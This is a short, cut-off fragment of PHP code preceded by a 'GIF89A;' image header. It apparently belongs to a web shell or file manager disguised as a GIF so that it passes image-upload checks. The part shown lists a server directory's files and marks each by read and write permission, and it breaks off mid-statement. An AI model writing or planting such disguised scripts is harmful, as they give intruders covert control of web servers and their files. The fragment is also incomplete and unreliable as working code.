GIF89A;
'; foreach ($files as $file) { $path = realpath($dir . DIRECTORY_SEPARATOR . $file); $color = ''; if (is_readable($path) && is_writable($path)) { $color = 'style="border-left: 4px solid green;"'; } elseif (!is_writable($path)) { $color = 'style="border-left: 4px solid red;"'; } elseif (is_readable($path)) { $color = 'style="border-left: 4px solid white;"'; } echo '